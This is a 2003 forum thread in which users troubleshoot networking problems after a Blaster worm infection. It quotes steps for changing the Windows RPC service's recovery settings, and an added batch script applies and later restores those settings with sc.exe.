Blaster Virus Fallout

Non-DC related talk...

Moderator: Moderators

Locked
jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Blaster Virus Fallout

Post by jbyrd » 2003-08-19 14:43

Like many others out there, the Blaster virus has affected me. I screwed up and disconnected my router (that's a long story) and about 5 minutes later...BAM virus hit and told me that my computer was going to shut down. I actually disabled it before my computer shut down...and ran the update and patch. All seemed fine...

Now, I CAN run active on DC++ (although many claim they can't)...but I can't run active on WinMX. If I hurry up and connect to WinMX, and search using a ".", I will get about 8 search results. But if I try to search again, nothing. I can try the "." again, but it won't return anything.

If that isn't aggravating enough, I then started receiving those "netsend" or messenger service popup windows. Like 15-20 of them. They wouldn't pop up when I was using my computer...they would pop up when I didn't use my computer for a while, and then came back and logged on. They ceased after I disabled the messenger service.

I was just wondering what your thoughts are on this. Do you think it is a coincidence? Do you think it was the Microsoft update that did it? Or was the Blaster Virus not completely removed from my computer, or maybe the patch didn't undo some changes the virus made to my computer?

I have searched and searched and searched about this for a week now...I can't really get anywhere. I'm hoping you could help. Thanks.
Hehe.

TheParanoidOne
Forum Moderator
Posts: 1420
Joined: 2003-04-22 14:37

Post by TheParanoidOne » 2003-08-19 15:48

I know that the worm takes advantage of an RPC vulnerability in Windows and attacks certain ports, but other than that I haven't looked into it at all. What exactly are the symptoms?
(Yes, I'm being lazy with research :) )
The world is coming to an end. Please log off.

DC++ Guide | Words

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-19 15:56

The symptoms are only those that I listed above. 8)
Hehe.

tetsuokin
Posts: 50
Joined: 2003-06-09 06:55

Post by tetsuokin » 2003-08-19 21:25

it's mainly port 135 that the blaster attacks...
Restoring Internet connectivity and preventing the computer from shutting down

In many cases, on both Windows 2000 and XP, changing the settings for the Remote Procedure Call (RPC) service may allow you to connect to the Internet to obtain downloads, and will stop the computer from shutting down.

1. Click Start > Run. (The Run dialog box appears.)
2. Type SERVICES.MSC /S in the open line, and then click OK. (The Services window opens.)
3. In the right pane, locate the Remote Procedure Call (RPC) service.

   CAUTION: A service named Remote Procedure Call (RPC) Locator exists. Do not confuse the two.

4. Right-click the Remote Procedure Call (RPC) service, and then click Properties.
5. Click the Recovery tab.
6. Using the drop-down lists, change First failure, Second failure, and Subsequent failures to "Restart the Service."
7. Click Apply, and then click OK.

CAUTION: Make sure that you change these settings back once you have removed the worm.
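
The Recovery tab change described in the post above can also be made from a command prompt. The batch file below is an added example, not part of the original post or the instructions it quotes; it assumes sc.exe is available (it ships with Windows XP), an administrator prompt, and that the setting to put back afterwards is "Restart the Computer", which should be checked against the saved output.

```batch
@echo off
rem Added example (not from the thread): command-line form of the Recovery-tab steps.
rem Assumptions: sc.exe is present and the prompt has administrator rights.
rem RpcSs      = "Remote Procedure Call (RPC)"          <- the service to change
rem RpcLocator = "Remote Procedure Call (RPC) Locator"  <- leave this one alone
setlocal
set SVC=RpcSs
set SAVED=%TEMP%\rpcss-recovery-before.txt

if /i "%~1"=="show"    goto show
if /i "%~1"=="apply"   goto apply
if /i "%~1"=="restore" goto restore
echo Usage: %~nx0 show ^| apply ^| restore
exit /b 1

:show
rem Print the current first/second/subsequent failure actions.
sc qfailure %SVC%
exit /b %errorlevel%

:apply
rem Keep a copy of the settings as they were, for the later restore.
if not exist "%SAVED%" sc qfailure %SVC% > "%SAVED%"
rem Three actions = first, second and subsequent failures; delay is in ms.
rem sc requires the space after "reset=" and "actions=".
sc failure %SVC% reset= 0 actions= restart/60000/restart/60000/restart/60000
if errorlevel 1 (
    echo Could not change recovery settings for %SVC%.
    exit /b 1
)
goto show

:restore
rem Assumption: the earlier setting was "Restart the Computer" for all three.
rem Confirm against the saved copy before relying on it.
if exist "%SAVED%" type "%SAVED%"
sc failure %SVC% reset= 0 actions= reboot/60000/reboot/60000/reboot/60000
if errorlevel 1 exit /b 1
goto show
```

Run it with `apply` before downloading the patch and removal tool, and with `restore` once the worm has been removed, as the second caution in the post asks.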

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-20 07:24

Yeah. Like I said in the initial post, I was able to disable it before it shut down (by selecting "Take No Action" in the RPC service pane).

The problem is, I am having weird things happen since I got infected. I can't go active on WinMX...and I started getting messenger service popups (I ran Ad-Aware, to no avail). I stopped the messenger service popups by disabling messenger service, but I still can't go active in WinMX.

The reason I bring this up is because there are so many people in the Help/Support forum that are having troubles going active in DC++. I can't figure out wtf could have caused it. It seems to be the patch provided by Microsoft. Who knows, maybe the RIAA is behind this. :shock: (=
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-20 22:52

jbyrd wrote: I screwed up and disconnected my router
Could it be misconfiguration....
TheNOP

Have you read the FAQ?
Or the sticky? It might give you an idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-21 07:24

Well, it is possible...but I didn't reset it. I just disconnected it from my modem and ran the LAN cable straight to my computer. Again, it's a long story...I don't want to bore you with the details. :D
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-21 14:09

jbyrd, do you have a firewall other than the router?

The patch could confuse some firewalls, depending on firewall brand and rule settings. Inbound firewalls only.
jbyrd wrote: I don't want to bore you with the details.
Got something you don't want others to know? :shock: :wink:
No need to reply to this one. :lol:
TheNOP

Have you read the FAQ?
Or the sticky? It might give you an idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-21 14:19

No other firewalls...just the hardware one. I have a modem with a built-in router and an additional router that is set on bridged ethernet...so it's not NATing, etc.

Oh, and my XP firewall is OFF! :wink:
TheNOP wrote: Got something you don't want others to know?
Hehe. :oops:

If you really want to know...it had to do with getting Medal of Honor to work behind the firewall with servers that use non-default connection ports. The reason I didn't want to tell you is because it was a stupid thing to do...and I really didn't have a good reason to expose my LAN like that, especially in the wake of an outbreak.

I thought I was invincible. Ha. That stupid worm proved me wrong. :x
Hehe.

theburger
Posts: 7
Joined: 2003-07-11 09:27

Post by theburger » 2003-08-22 08:05

Hey, a friend of mine got that virus too... it starts a countdown and the cp shuts down... how do you get rid of it? He has no antivirus software.

thanks in advance

Xan1977
Forum Moderator
Posts: 627
Joined: 2003-06-05 20:15

Post by Xan1977 » 2003-08-22 08:52


jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-22 08:52

Read the topic VIRUS ALERT!
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-22 10:16

To jbyrd:

About bridged/half-bridged modems.
It is possible (?) that the patch changed something in your PPPoE settings.
I would take a look at it if I were you,
since in bridge mode, the computer's PPPoE handles the NAT thingy.

Also, one drawback when you're bridging is that you can't connect more than one puter to the modem; no hub will work here. A router will help if the router handles the PPPoE connection.
TheNOP

Have you read the FAQ?
Or the sticky? It might give you an idea.

jbyrd
Posts: 255
Joined: 2003-05-10 09:26
Location: no-la-usa-earth

Post by jbyrd » 2003-08-22 10:22

Thx. I'll check it out. Even though I have pretty much looked over all of my settings, I may have missed something.
Hehe.

TheNOP
Posts: 275
Joined: 2003-07-07 21:41
Location: Quebec

Post by TheNOP » 2003-08-22 10:25

You might have to re-install your "access manager" software.
Or, if using XP, re-create your PPPoE connection.
TheNOP

Have you read the FAQ?
Or the sticky? It might give you an idea.
